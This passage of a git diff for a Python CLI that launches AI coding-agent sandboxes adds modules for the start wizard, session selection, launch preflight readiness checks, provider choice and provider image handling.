sessions from both the CLI + (scc start with no args) and the dashboard (Enter on empty containers). + + Args: + skip_quick_resume: If True, bypass the Quick Resume picker. + allow_back: If True, Esc returns BACK sentinel (for dashboard context). + + Returns: + Structured outcome describing whether launch succeeded, was cancelled, + kept an existing sandbox, returned to the dashboard, or failed. + """ + # Step 1: First-run detection + if setup.is_setup_needed(): + if not setup.maybe_run_setup(console): + return StartWizardFlowResult( + decision=StartWizardFlowDecision.FAILED, + message="Start failed", + ) + + cfg = config.load_user_config() + adapters = get_default_adapters() + + # Step 2: Run interactive wizard + workspace, team, session_name, worktree_name = interactive_start( + cfg, + skip_quick_resume=skip_quick_resume, + allow_back=allow_back, + git_client=adapters.git_client, + ) + + # Three-state return handling: + if workspace is BACK: + return StartWizardFlowResult( + decision=StartWizardFlowDecision.BACK, + message="Start cancelled", + ) + if workspace is None: + return StartWizardFlowResult(decision=StartWizardFlowDecision.QUIT) + + workspace_value = cast(str, workspace) + + try: + with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): + adapters.sandbox_runtime.ensure_available() + workspace_path = validate_and_resolve_workspace(workspace_value) + workspace_path = prepare_workspace(workspace_path, worktree_name, install_deps=False) + assert workspace_path is not None + _configure_team_settings(team, cfg) + + standalone_mode = config.is_standalone_mode() or team is None + raw_org_config = None + if team and not standalone_mode: + raw_org_config = config.load_cached_org_config() + + # D032: resolve provider explicitly — never silent-default to Claude. + normalized_org = ( + NormalizedOrgConfig.from_dict(raw_org_config) if raw_org_config is not None else None + ) + resolved_provider, _resolution_source = resolve_launch_provider( + cli_flag=None, + resume_provider=None, + workspace_path=workspace_path, + config_provider=config.get_selected_provider(), + normalized_org=normalized_org, + team=team, + adapters=adapters, + non_interactive=False, + ) + if resolved_provider is None: + console.print("[dim]Cancelled.[/dim]") + return StartWizardFlowResult( + decision=StartWizardFlowDecision.CANCELLED, + message="Start cancelled", + ) + + # Shared preflight: readiness check before plan construction + readiness = collect_launch_readiness(resolved_provider, _resolution_source, adapters) + if not readiness.launch_ready: + ensure_launch_ready( + readiness, + adapters=adapters, + console=console, + non_interactive=False, + show_notice=show_auth_bootstrap_panel, + ) + + start_request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=team, + session_name=session_name, + resume=False, + fresh=False, + offline=False, + standalone=standalone_mode, + dry_run=False, + allow_suspicious=False, + org_config=normalized_org, + raw_org_config=raw_org_config, + provider_id=resolved_provider, + ) + start_dependencies, start_plan = prepare_live_start_plan( + start_request, + adapters=adapters, + console=console, + provider_id=resolved_provider, + ) + + output_view_model = build_sync_output_view_model(start_plan) + render_launch_output(output_view_model, console=console, json_mode=False) + + resolver_result = start_plan.resolver_result + if resolver_result.is_mount_expanded: + console.print() + console.print( + create_info_panel( + "Worktree Detected", + f"Mounting parent directory for worktree support:\n{resolver_result.mount_root}", + "Both worktree and main repo will be accessible", + ) + ) + console.print() + current_branch = start_plan.current_branch + + conflict_resolution = resolve_launch_conflict( + start_plan, + dependencies=start_dependencies, + console=console, + display_name=get_provider_display_name(resolved_provider), + json_mode=False, + non_interactive=False, + ) + if conflict_resolution.decision is LaunchConflictDecision.KEEP_EXISTING: + set_workspace_last_used_provider(workspace_path, resolved_provider) + return StartWizardFlowResult( + decision=StartWizardFlowDecision.KEPT_EXISTING, + message="Kept existing sandbox", + ) + if conflict_resolution.decision is LaunchConflictDecision.CANCELLED: + console.print("[dim]Cancelled.[/dim]") + return StartWizardFlowResult( + decision=StartWizardFlowDecision.CANCELLED, + message="Start cancelled", + ) + start_plan = conflict_resolution.plan + + _record_session_and_context( + workspace_path, + team, + session_name, + current_branch, + provider_id=start_request.provider_id, + ) + show_launch_panel( + workspace=workspace_path, + team=team, + session_name=session_name, + branch=current_branch, + is_resume=False, + display_name=get_provider_display_name(resolved_provider), + ) + finalize_launch(start_plan, dependencies=start_dependencies) + set_workspace_last_used_provider(workspace_path, resolved_provider) + return StartWizardFlowResult(decision=StartWizardFlowDecision.LAUNCHED) + except Exception as e: + err_console.print(f"[red]Error launching sandbox: {e}[/red]") + return StartWizardFlowResult( + decision=StartWizardFlowDecision.FAILED, + message="Start failed", + ) diff --git a/src/scc_cli/commands/launch/flow_session.py b/src/scc_cli/commands/launch/flow_session.py new file mode 100644 index 0000000..1f4467d --- /dev/null +++ b/src/scc_cli/commands/launch/flow_session.py @@ -0,0 +1,440 @@ +"""Session resolution and personal profile helpers for the launch flow. + +Extracted from flow.py to reduce module size. Contains: +- _resolve_session_selection: handles --select, --resume, and interactive entry +- _apply_personal_profile / _build_personal_profile_request / _render_* +- _prompt_for_session_selection +- _record_session_and_context +""" + +from __future__ import annotations + +import logging +from pathlib import Path +from typing import Any, cast + +import typer + +from ... import config, git, sessions +from ...application.launch import ( + ApplyPersonalProfileConfirmation, + ApplyPersonalProfileDependencies, + ApplyPersonalProfileRequest, + ApplyPersonalProfileResult, + SelectSessionDependencies, + SelectSessionRequest, + SelectSessionResult, + SessionSelectionItem, + SessionSelectionMode, + SessionSelectionPrompt, + SessionSelectionWarningOutcome, + apply_personal_profile, + select_session, +) +from ...application.sessions import SessionService +from ...bootstrap import get_default_adapters +from ...cli_common import console, err_console +from ...contexts import WorkContext, record_context +from ...core.enums import TargetType +from ...core.exit_codes import EXIT_USAGE +from ...output_mode import print_human, print_json +from ...ports.personal_profile_service import PersonalProfileService +from ...presentation.json.profile_json import build_profile_apply_envelope +from ...ui.chrome import print_with_layout +from ...ui.gate import is_interactive_allowed +from ...ui.picker import pick_session +from ...ui.prompts import confirm_with_layout + + +def _resolve_session_selection( + workspace: str | None, + team: str | None, + resume: bool, + select: bool, + cfg: dict[str, Any], + *, + json_mode: bool = False, + standalone_override: bool = False, + no_interactive: bool = False, + dry_run: bool = False, + session_service: SessionService, +) -> tuple[str | None, str | None, str | None, str | None, bool, bool, str | None]: + """Handle session selection logic for --select, --resume, and interactive modes. + + Returns: + Tuple of ( + workspace, + team, + session_name, + worktree_name, + cancelled, + was_auto_detected, + session_provider_id, + ) + """ + session_name = None + worktree_name = None + cancelled = False + session_provider_id: str | None = None + + select_dependencies = SelectSessionDependencies(session_service=session_service) + + # Interactive mode if no workspace provided and no session flags + if workspace is None and not resume and not select: + # For --dry-run without workspace, use resolver to auto-detect (skip interactive) + if dry_run: + from pathlib import Path + + from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace + + context = resolve_workspace(ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None)) + if context is not None: + return ( + str(context.workspace_root), + team, + None, + None, + False, + True, + None, + ) # auto-detected + # No auto-detect possible, fall through to error + err_console.print( + "[red]Error:[/red] No workspace could be auto-detected.\n" + "[dim]Provide a workspace path: scc start --dry-run /path/to/project[/dim]", + highlight=False, + ) + raise typer.Exit(EXIT_USAGE) + + # Check TTY gating before entering interactive mode + if not is_interactive_allowed( + json_mode=json_mode, + no_interactive_flag=no_interactive, + ): + # Try auto-detect before failing + from pathlib import Path + + from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace + + context = resolve_workspace(ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None)) + if context is not None: + return ( + str(context.workspace_root), + team, + None, + None, + False, + True, + None, + ) # auto-detected + + err_console.print( + "[red]Error:[/red] Interactive mode requires a terminal (TTY).\n" + "[dim]Provide a workspace path: scc start /path/to/project[/dim]", + highlight=False, + ) + raise typer.Exit(EXIT_USAGE) + + # Deferred import to avoid circular dependency + from .flow_interactive import interactive_start + + adapters = get_default_adapters() + workspace_result, team, session_name, worktree_name = cast( + tuple[str | None, str | None, str | None, str | None], + interactive_start( + cfg, + standalone_override=standalone_override, + team_override=team, + git_client=adapters.git_client, + ), + ) + if workspace_result is None: + return None, team, None, None, True, False, None + return ( + workspace_result, + team, + session_name, + worktree_name, + False, + False, + None, + ) + + # Handle --select: interactive session picker + if select and workspace is None: + # Check TTY gating before showing session picker + if not is_interactive_allowed( + json_mode=json_mode, + no_interactive_flag=no_interactive, + ): + console.print( + "[red]Error:[/red] --select requires a terminal (TTY).\n" + "[dim]Use --resume to auto-select most recent session.[/dim]", + highlight=False, + ) + raise typer.Exit(EXIT_USAGE) + + # Prefer explicit --team, then selected_profile for filtering + effective_team = team or cfg.get("selected_profile") + if standalone_override: + effective_team = None + + # If org mode and no active team, require explicit selection + if effective_team is None and not standalone_override: + if not json_mode: + console.print( + "[yellow]No active team selected.[/yellow] " + "Run 'scc team switch' or pass --team to select." + ) + return None, team, None, None, False, False, None + + outcome = select_session( + SelectSessionRequest( + mode=SessionSelectionMode.SELECT, + team=effective_team, + include_all=False, + limit=10, + ), + dependencies=select_dependencies, + ) + + if isinstance(outcome, SessionSelectionWarningOutcome): + if not json_mode: + console.print("[yellow]No recent sessions found.[/yellow]") + return None, team, None, None, False, False, None + + if isinstance(outcome, SessionSelectionPrompt): + selected_item = _prompt_for_session_selection(outcome) + if selected_item is None: + return None, team, None, None, True, False, None + outcome = select_session( + SelectSessionRequest( + mode=SessionSelectionMode.SELECT, + team=effective_team, + include_all=False, + limit=10, + selection=selected_item, + ), + dependencies=select_dependencies, + ) + + if isinstance(outcome, SelectSessionResult): + selected = outcome.session + workspace = selected.workspace + if not team: + team = selected.team + session_provider_id = selected.provider_id + # --standalone overrides any team from session (standalone means no team) + if standalone_override: + team = None + if not json_mode: + print_with_layout(console, f"[dim]Selected: {workspace}[/dim]") + + # Handle --resume: auto-select most recent session + elif resume and workspace is None: + # Prefer explicit --team, then selected_profile for resume filtering + effective_team = team or cfg.get("selected_profile") + if standalone_override: + effective_team = None + + # If org mode and no active team, require explicit selection + if effective_team is None and not standalone_override: + if not json_mode: + console.print( + "[yellow]No active team selected.[/yellow] " + "Run 'scc team switch' or pass --team to resume." + ) + return None, team, None, None, False, False, None + + outcome = select_session( + SelectSessionRequest( + mode=SessionSelectionMode.RESUME, + team=effective_team, + include_all=False, + limit=50, + ), + dependencies=select_dependencies, + ) + + if isinstance(outcome, SessionSelectionWarningOutcome): + if not json_mode: + console.print("[yellow]No recent sessions found.[/yellow]") + return None, team, None, None, False, False, None + + if isinstance(outcome, SelectSessionResult): + recent_session = outcome.session + workspace = recent_session.workspace + if not team: + team = recent_session.team + session_provider_id = recent_session.provider_id + # --standalone overrides any team from session (standalone means no team) + if standalone_override: + team = None + if not json_mode: + print_with_layout(console, f"[dim]Resuming: {workspace}[/dim]") + + return ( + workspace, + team, + session_name, + worktree_name, + cancelled, + False, + session_provider_id, + ) # explicit workspace + + +def _apply_personal_profile( + workspace_path: Path, + *, + org_config: dict[str, Any] | None, + json_mode: bool, + non_interactive: bool, + profile_service: PersonalProfileService, +) -> tuple[str | None, bool]: + """Apply personal profile if available. + + Returns (profile_id, applied). + """ + request = _build_personal_profile_request( + workspace_path, + json_mode=json_mode, + non_interactive=non_interactive, + confirm_apply=None, + org_config=org_config, + ) + dependencies = ApplyPersonalProfileDependencies(profile_service=profile_service) + + while True: + outcome = apply_personal_profile(request, dependencies=dependencies) + if isinstance(outcome, ApplyPersonalProfileConfirmation): + _render_personal_profile_confirmation(outcome, json_mode=json_mode) + confirm = confirm_with_layout( + console, + outcome.request.prompt, + default=outcome.default_response, + ) + request = _build_personal_profile_request( + workspace_path, + json_mode=json_mode, + non_interactive=non_interactive, + confirm_apply=confirm, + org_config=org_config, + ) + continue + + if isinstance(outcome, ApplyPersonalProfileResult): + _render_personal_profile_result(outcome, json_mode=json_mode) + return outcome.profile_id, outcome.applied + + return None, False + + +def _build_personal_profile_request( + workspace_path: Path, + *, + json_mode: bool, + non_interactive: bool, + confirm_apply: bool | None, + org_config: dict[str, Any] | None, +) -> ApplyPersonalProfileRequest: + return ApplyPersonalProfileRequest( + workspace_path=workspace_path, + interactive_allowed=is_interactive_allowed( + json_mode=json_mode, + no_interactive_flag=non_interactive, + ), + confirm_apply=confirm_apply, + org_config=org_config, + ) + + +def _render_personal_profile_confirmation( + outcome: ApplyPersonalProfileConfirmation, *, json_mode: bool +) -> None: + if json_mode: + return + if outcome.message: + console.print(outcome.message) + + +def _render_personal_profile_result( + outcome: ApplyPersonalProfileResult, *, json_mode: bool +) -> None: + if json_mode: + envelope = build_profile_apply_envelope(outcome) + print_json(envelope) + return + if outcome.skipped_items: + for skipped in outcome.skipped_items: + label = "plugin" if skipped.target_type == TargetType.PLUGIN else "MCP server" + console.print(f"[yellow]Skipped {label} '{skipped.item}': {skipped.reason}[/yellow]") + if outcome.message: + console.print(outcome.message) + + +def _prompt_for_session_selection(prompt: SessionSelectionPrompt) -> SessionSelectionItem | None: + items = [option.value for option in prompt.request.options if option.value is not None] + if not items: + return None + summaries = [item.summary for item in items] + selected = pick_session( + summaries, + title=prompt.request.title, + subtitle=prompt.request.subtitle, + ) + if selected is None: + return None + try: + index = summaries.index(selected) + except ValueError: + return None + return items[index] + + +def _record_session_and_context( + workspace_path: Path, + team: str | None, + session_name: str | None, + current_branch: str | None, + provider_id: str | None = None, +) -> None: + """Record session metadata and quick-resume context.""" + sessions.record_session( + workspace=str(workspace_path), + team=team, + session_name=session_name, + container_name=None, + branch=current_branch, + provider_id=provider_id, + ) + repo_root = git.get_worktree_main_repo(workspace_path) or workspace_path + worktree_name = workspace_path.name + context = WorkContext( + team=team, + repo_root=repo_root, + worktree_path=workspace_path, + worktree_name=worktree_name, + branch=current_branch, + last_session_id=session_name, + provider_id=provider_id, + ) + try: + record_context(context) + except (OSError, ValueError) as exc: + print_human( + "[yellow]Warning:[/yellow] Could not save Quick Resume context.", + highlight=False, + ) + print_human(f"[dim]{exc}[/dim]", highlight=False) + logging.debug(f"Failed to record context for Quick Resume: {exc}") + if team: + try: + config.set_workspace_team(str(workspace_path), team) + except (OSError, ValueError) as exc: + print_human( + "[yellow]Warning:[/yellow] Could not save workspace team preference.", + highlight=False, + ) + print_human(f"[dim]{exc}[/dim]", highlight=False) + logging.debug(f"Failed to store workspace team mapping: {exc}") diff --git a/src/scc_cli/commands/launch/flow_types.py b/src/scc_cli/commands/launch/flow_types.py index da29ad9..64880ff 100644 --- a/src/scc_cli/commands/launch/flow_types.py +++ b/src/scc_cli/commands/launch/flow_types.py @@ -4,7 +4,7 @@ from dataclasses import dataclass from pathlib import Path -from typing import Any, TypeAlias +from typing import TypeAlias from ...application.launch import ( StartWizardContext, @@ -13,29 +13,29 @@ WorkspaceSource, ) from ...contexts import WorkContext +from ...ui.keys import _BackSentinel -UserConfig: TypeAlias = dict[str, Any] +StartWizardResult: TypeAlias = tuple[ + str | _BackSentinel | None, + str | None, + str | None, + str | None, +] +QuickResumeResolution: TypeAlias = StartWizardState | StartWizardResult +WorkspaceResumeResolution: TypeAlias = StartWizardState | StartWizardResult | None -@dataclass -class WizardRenderContext: - """Shared context for wizard rendering helpers. - - Holds configuration that would otherwise be captured as closure variables - in nested functions. Passing this explicitly makes the helpers testable - and allows them to live at module level. - """ +@dataclass(frozen=True) +class WizardResumeContext: + """Explicit inputs for quick-resume helper flows.""" standalone_mode: bool + allow_back: bool effective_team: str | None team_override: str | None active_team_label: str active_team_context: str current_branch: str | None - workspace_base: str - allow_back: bool - available_teams: list[dict[str, Any]] - selected_profile: str | None def set_team_context(state: StartWizardState, team: str | None) -> StartWizardState: diff --git a/src/scc_cli/commands/launch/preflight.py b/src/scc_cli/commands/launch/preflight.py new file mode 100644 index 0000000..53fe8b7 --- /dev/null +++ b/src/scc_cli/commands/launch/preflight.py @@ -0,0 +1,380 @@ +"""Shared launch preflight: typed readiness model with pure/side-effect separation. + +This module provides a clean three-function split for launch preflight: + +1. ``resolve_launch_provider()`` — pure decision: who are we launching? +2. ``collect_launch_readiness()`` — side-effect read: what's the current state? +3. ``ensure_launch_ready()`` — side-effect write: fix gaps or fail clearly. + +Architecture guard (D046): command-layer only. No imports from core/ except +types and errors. No provider-specific behavior — dispatches to +provider_image.py for image bootstrap, and handles auth bootstrap directly +in ``_ensure_auth()`` (the canonical auth messaging location). +""" + +from __future__ import annotations + +from dataclasses import dataclass +from enum import Enum +from pathlib import Path +from typing import Any + +from scc_cli.commands.launch.provider_choice import ( + choose_start_provider, + collect_provider_readiness, + connected_provider_ids, + prompt_for_provider_choice, +) +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.ports.config_models import NormalizedOrgConfig + +# ───────────────────────────────────────────────────────────────────────────── +# Typed readiness model +# ───────────────────────────────────────────────────────────────────────────── + + +class ImageStatus(Enum): + """Whether the provider container image is locally available.""" + + AVAILABLE = "available" + MISSING = "missing" + UNKNOWN = "unknown" + + +class AuthStatus(Enum): + """Whether the provider auth cache is usable.""" + + PRESENT = "present" + MISSING = "missing" + EXPIRED = "expired" + UNKNOWN = "unknown" + + +class ProviderResolutionSource(Enum): + """How the provider was resolved for this launch.""" + + EXPLICIT = "explicit" + RESUME = "resume" + WORKSPACE_LAST_USED = "workspace_last_used" + GLOBAL_PREFERRED = "global_preferred" + AUTO_SINGLE = "auto_single" + PROMPTED = "prompted" + + +@dataclass(frozen=True) +class LaunchReadiness: + """Fully typed snapshot of launch readiness for one provider. + + Derived booleans prevent callers from re-implementing status→action logic. + ``launch_ready`` is True only when both image and auth are present. + """ + + provider_id: str + resolution_source: ProviderResolutionSource + image_status: ImageStatus + auth_status: AuthStatus + requires_image_bootstrap: bool + requires_auth_bootstrap: bool + launch_ready: bool + + +# ───────────────────────────────────────────────────────────────────────────── +# Pure decision functions (no I/O) +# ───────────────────────────────────────────────────────────────────────────── + + +def allowed_provider_ids( + normalized_org: NormalizedOrgConfig | None, + team: str | None, +) -> tuple[str, ...]: + """Return the allowed providers for the active team, or all when unrestricted. + + Moved from flow._allowed_provider_ids to make it a public, reusable contract. + """ + if normalized_org is not None and team: + team_profile = normalized_org.get_profile(team) + if team_profile is not None: + return team_profile.allowed_providers + return () + + +def resolve_launch_provider( + *, + cli_flag: str | None, + resume_provider: str | None, + workspace_path: Path | None, + config_provider: str | None, + normalized_org: NormalizedOrgConfig | None, + team: str | None, + adapters: Any, + non_interactive: bool, +) -> tuple[str | None, ProviderResolutionSource]: + """Resolve provider for a launch request with standard precedence. + + Returns (provider_id, source) — the resolved provider and how it was chosen. + Pure data assembly → delegates to choose_start_provider(). + """ + allowed = allowed_provider_ids(normalized_org, team) + + # workspace_last_used requires a valid workspace path + workspace_last_used: str | None = None + if workspace_path is not None: + from scc_cli.workspace_local_config import get_workspace_last_used_provider + + workspace_last_used = get_workspace_last_used_provider(workspace_path) + + connected = connected_provider_ids(adapters, allowed_providers=allowed) + + # Track which source resolved the provider by wrapping the prompt callback + source_holder: list[ProviderResolutionSource] = [] + + def tracking_prompt( + candidates: tuple[str, ...], + connected_ids: tuple[str, ...], + default: str | None, + ) -> str | None: + source_holder.append(ProviderResolutionSource.PROMPTED) + return prompt_for_provider_choice(candidates, connected_ids, default) + + provider_id = choose_start_provider( + cli_flag=cli_flag, + resume_provider=resume_provider, + workspace_last_used=workspace_last_used, + config_provider=config_provider, + connected_provider_ids=connected, + allowed_providers=allowed, + non_interactive=non_interactive, + prompt_choice=tracking_prompt, + ) + + if source_holder: + return provider_id, ProviderResolutionSource.PROMPTED + + # Determine source from what was provided + source = _infer_resolution_source( + provider_id=provider_id, + cli_flag=cli_flag, + resume_provider=resume_provider, + workspace_last_used=workspace_last_used, + config_provider=config_provider, + connected=connected, + allowed=allowed, + ) + return provider_id, source + + +def _infer_resolution_source( + *, + provider_id: str | None, + cli_flag: str | None, + resume_provider: str | None, + workspace_last_used: str | None, + config_provider: str | None, + connected: tuple[str, ...], + allowed: tuple[str, ...], +) -> ProviderResolutionSource: + """Infer which precedence tier produced the resolved provider_id. + + Mirrors the precedence in resolve_provider_preference + auto-single fallback. + """ + if provider_id is None: + # No resolution — return EXPLICIT as a sentinel (caller checks None) + return ProviderResolutionSource.EXPLICIT + + if cli_flag is not None and cli_flag == provider_id: + return ProviderResolutionSource.EXPLICIT + if resume_provider is not None and resume_provider == provider_id: + return ProviderResolutionSource.RESUME + if workspace_last_used is not None and workspace_last_used == provider_id: + return ProviderResolutionSource.WORKSPACE_LAST_USED + if config_provider is not None and config_provider == provider_id: + return ProviderResolutionSource.GLOBAL_PREFERRED + + # Auto-single: only one provider was connected or allowed + from scc_cli.core.provider_resolution import KNOWN_PROVIDERS + + candidates = allowed or KNOWN_PROVIDERS + connected_allowed = tuple(pid for pid in connected if pid in candidates) + if len(connected_allowed) == 1 or len(candidates) == 1: + return ProviderResolutionSource.AUTO_SINGLE + + return ProviderResolutionSource.EXPLICIT + + +# ───────────────────────────────────────────────────────────────────────────── +# Readiness collection (reads adapter state, no mutations) +# ───────────────────────────────────────────────────────────────────────────── + + +def _auth_readiness_to_status(readiness: AuthReadiness | None) -> AuthStatus: + """Map the existing AuthReadiness contract to the typed AuthStatus enum.""" + if readiness is None: + return AuthStatus.UNKNOWN + status = readiness.status + if status == "present": + return AuthStatus.PRESENT + if status == "missing": + return AuthStatus.MISSING + if status == "expired": + return AuthStatus.EXPIRED + return AuthStatus.UNKNOWN + + +def _check_image_available(provider_id: str) -> ImageStatus: + """Probe whether the provider container image exists locally. + + Uses provider_image._provider_image_exists() but catches all subprocess + errors to return UNKNOWN rather than crash the readiness check. + """ + try: + from scc_cli.commands.launch.provider_image import _provider_image_exists + from scc_cli.core.provider_registry import get_runtime_spec + + spec = get_runtime_spec(provider_id) + if _provider_image_exists(spec.image_ref): + return ImageStatus.AVAILABLE + return ImageStatus.MISSING + except Exception: + return ImageStatus.UNKNOWN + + +def collect_launch_readiness( + provider_id: str, + resolution_source: ProviderResolutionSource, + adapters: Any, +) -> LaunchReadiness: + """Check image availability and auth readiness, return typed state. + + No fixing, no side effects — just reads current state. + """ + image_status = _check_image_available(provider_id) + + # Get auth readiness for this specific provider + readiness_map = collect_provider_readiness(adapters, allowed_providers=(provider_id,)) + auth_readiness = readiness_map.get(provider_id) + auth_status = _auth_readiness_to_status(auth_readiness) + + requires_image = image_status == ImageStatus.MISSING + requires_auth = auth_status in (AuthStatus.MISSING, AuthStatus.EXPIRED) + + return LaunchReadiness( + provider_id=provider_id, + resolution_source=resolution_source, + image_status=image_status, + auth_status=auth_status, + requires_image_bootstrap=requires_image, + requires_auth_bootstrap=requires_auth, + launch_ready=(not requires_image and not requires_auth), + ) + + +# ───────────────────────────────────────────────────────────────────────────── +# Side-effect function (fixes gaps or fails) +# ───────────────────────────────────────────────────────────────────────────── + + +def ensure_launch_ready( + readiness: LaunchReadiness, + *, + adapters: Any, + console: Any, + non_interactive: bool, + show_notice: Any, +) -> None: + """Fix launch readiness gaps or raise typed errors. + + Uses readiness.requires_image_bootstrap / requires_auth_bootstrap + to decide — no re-probing. In non-interactive mode: raises typed + ProviderNotReadyError with actionable guidance instead of prompting. + + The ``adapters`` parameter provides access to the provider adapter + for performing auth bootstrap (browser sign-in flow). + """ + if readiness.launch_ready: + return + + if readiness.requires_image_bootstrap: + from scc_cli.commands.launch.provider_image import ensure_provider_image + + ensure_provider_image( + readiness.provider_id, + console=console, + non_interactive=non_interactive, + show_notice=show_notice, + ) + + if readiness.requires_auth_bootstrap: + _ensure_auth( + readiness, + adapters=adapters, + non_interactive=non_interactive, + show_notice=show_notice, + ) + + +def _ensure_auth( + readiness: LaunchReadiness, + *, + adapters: Any, + non_interactive: bool, + show_notice: Any, + provider: Any | None = None, +) -> None: + """Handle auth bootstrap for a provider with missing/expired auth. + + Non-interactive: raises ProviderNotReadyError with actionable guidance. + Interactive: shows the notice, then calls provider.bootstrap_auth() + to trigger the browser sign-in flow. + + If ``provider`` is passed directly, the adapter lookup via ``adapters`` + is skipped. This is used by the deprecated ``auth_bootstrap.py`` redirect + which already has the provider in hand. + """ + from scc_cli.core.provider_resolution import get_provider_display_name + + display_name = get_provider_display_name(readiness.provider_id) + + if non_interactive: + raise ProviderNotReadyError( + provider_id=readiness.provider_id, + user_message=( + f"{display_name} auth cache is {readiness.auth_status.value} " + f"and this start is non-interactive." + ), + suggested_action=( + f"Run 'scc start --provider {readiness.provider_id}' interactively " + "once and complete the one-time browser sign-in." + ), + ) + + show_notice( + f"Authenticating {display_name}", + ( + f"No reusable {display_name} auth cache was found for this sandbox.\n\n" + f"SCC will open the normal {display_name} browser sign-in flow now. " + f"After sign-in completes, {display_name} will launch automatically." + ), + (f"Future starts reuse the provider auth cache from the persistent {display_name} volume."), + ) + + if provider is None: + from scc_cli.commands.launch.dependencies import get_agent_provider + + provider = get_agent_provider(adapters, readiness.provider_id) + + if provider is not None: + try: + provider.bootstrap_auth() + except ProviderNotReadyError: + raise + except Exception as exc: + raise ProviderNotReadyError( + provider_id=readiness.provider_id, + user_message=(f"{display_name} auth bootstrap failed: {exc}"), + suggested_action=( + f"Run 'scc start --provider {readiness.provider_id}' interactively " + "to complete the browser sign-in. If the issue persists, " + f"run 'scc doctor --provider {readiness.provider_id}' to diagnose." + ), + ) from exc diff --git a/src/scc_cli/commands/launch/provider_choice.py b/src/scc_cli/commands/launch/provider_choice.py new file mode 100644 index 0000000..eb46317 --- /dev/null +++ b/src/scc_cli/commands/launch/provider_choice.py @@ -0,0 +1,172 @@ +"""Policy helpers for choosing a provider at launch time.""" + +from __future__ import annotations + +from collections.abc import Callable +from typing import Any + +from rich.panel import Panel +from rich.table import Table + +from scc_cli.application.provider_selection import resolve_provider_preference +from scc_cli.cli_common import console +from scc_cli.commands.launch.dependencies import get_agent_provider +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ProviderNotReadyError +from scc_cli.core.provider_resolution import KNOWN_PROVIDERS, get_provider_display_name +from scc_cli.ui.chrome import print_with_layout +from scc_cli.ui.prompts import prompt_with_layout + + +def choose_start_provider( + *, + cli_flag: str | None, + resume_provider: str | None, + workspace_last_used: str | None, + config_provider: str | None, + connected_provider_ids: tuple[str, ...], + allowed_providers: tuple[str, ...], + non_interactive: bool, + prompt_choice: Callable[[tuple[str, ...], tuple[str, ...], str | None], str | None] | None, +) -> str | None: + """Choose the provider for a start request using stable precedence.""" + resolved = resolve_provider_preference( + cli_flag=cli_flag, + resume_provider=resume_provider, + workspace_last_used=workspace_last_used, + global_preferred=config_provider, + allowed_providers=allowed_providers, + ) + if resolved is not None: + return resolved.provider_id + + candidates = allowed_providers or KNOWN_PROVIDERS + connected_allowed = tuple(pid for pid in connected_provider_ids if pid in candidates) + + if len(connected_allowed) == 1: + return connected_allowed[0] + if len(candidates) == 1: + return candidates[0] + + if non_interactive: + raise ProviderNotReadyError( + user_message="Multiple providers are available but no provider was selected.", + suggested_action=( + "Pass '--provider claude' or '--provider codex', or set a global " + "preference with 'scc provider set '." + ), + ) + + if prompt_choice is None: + raise ProviderNotReadyError( + user_message="Provider selection requires an interactive prompt.", + suggested_action="Re-run this start in an interactive terminal.", + ) + + return prompt_choice( + candidates, + connected_allowed, + _resolve_prompt_default( + candidates=candidates, + connected_allowed=connected_allowed, + workspace_last_used=workspace_last_used, + config_provider=config_provider, + ), + ) + + +def collect_provider_readiness( + adapters: Any, + *, + allowed_providers: tuple[str, ...] = (), +) -> dict[str, AuthReadiness]: + """Return provider auth readiness for all allowed providers.""" + candidates = allowed_providers or KNOWN_PROVIDERS + result: dict[str, AuthReadiness] = {} + for provider_id in candidates: + adapter = get_agent_provider(adapters, provider_id) + if adapter is None: + continue + result[provider_id] = adapter.auth_check() + return result + + +def connected_provider_ids( + adapters: Any, + *, + allowed_providers: tuple[str, ...] = (), +) -> tuple[str, ...]: + """Return the allowed providers whose auth cache is already present.""" + readiness = collect_provider_readiness(adapters, allowed_providers=allowed_providers) + return tuple( + provider_id for provider_id, state in readiness.items() if state.status == "present" + ) + + +def prompt_for_provider_choice( + allowed_provider_ids: tuple[str, ...], + connected_provider_ids: tuple[str, ...], + default_provider_id: str | None, +) -> str | None: + """Prompt the operator to choose a provider for this start.""" + table = Table.grid(padding=(0, 2)) + table.add_column(style="yellow", no_wrap=True) + table.add_column(style="white", no_wrap=True) + table.add_column(style="dim") + + default_choice = "1" + for index, provider_id in enumerate(allowed_provider_ids, start=1): + if default_provider_id == provider_id: + default_choice = str(index) + elif provider_id in connected_provider_ids and default_choice == "1": + default_choice = str(index) + status = "auth cache present" if provider_id in connected_provider_ids else "sign-in needed" + table.add_row( + f"[{index}]", + get_provider_display_name(provider_id), + status, + ) + table.add_row("[0]", "Cancel", "Exit without starting") + + subtitle = ( + "No provider preference was resolved automatically. " + "Choose which coding agent to launch for this workspace." + ) + console.print() + print_with_layout( + console, + Panel( + table, + title="[bold cyan]Choose Provider[/bold cyan]", + subtitle=subtitle, + border_style="bright_black", + padding=(0, 1), + ), + constrain=True, + ) + console.print() + + choice = prompt_with_layout( + console, + "[cyan]Select provider[/cyan]", + choices=["0", *[str(i) for i in range(1, len(allowed_provider_ids) + 1)]], + default=default_choice, + ) + if choice == "0": + return None + return allowed_provider_ids[int(choice) - 1] + + +def _resolve_prompt_default( + *, + candidates: tuple[str, ...], + connected_allowed: tuple[str, ...], + workspace_last_used: str | None, + config_provider: str | None, +) -> str | None: + """Return the best default selection for an interactive provider chooser.""" + if workspace_last_used in connected_allowed and workspace_last_used in candidates: + return workspace_last_used + if config_provider in connected_allowed and config_provider in candidates: + return config_provider + return None diff --git a/src/scc_cli/commands/launch/provider_image.py b/src/scc_cli/commands/launch/provider_image.py new file mode 100644 index 0000000..f38df9b --- /dev/null +++ b/src/scc_cli/commands/launch/provider_image.py @@ -0,0 +1,123 @@ +"""Provider image readiness helpers for interactive launch flows.""" + +from __future__ import annotations + +import shlex +import subprocess +from collections.abc import Callable +from pathlib import Path + +from rich.console import Console +from rich.status import Status + +from scc_cli.core.errors import ProviderImageBuildError, ProviderImageMissingError +from scc_cli.core.provider_registry import get_runtime_spec +from scc_cli.theme import Spinners 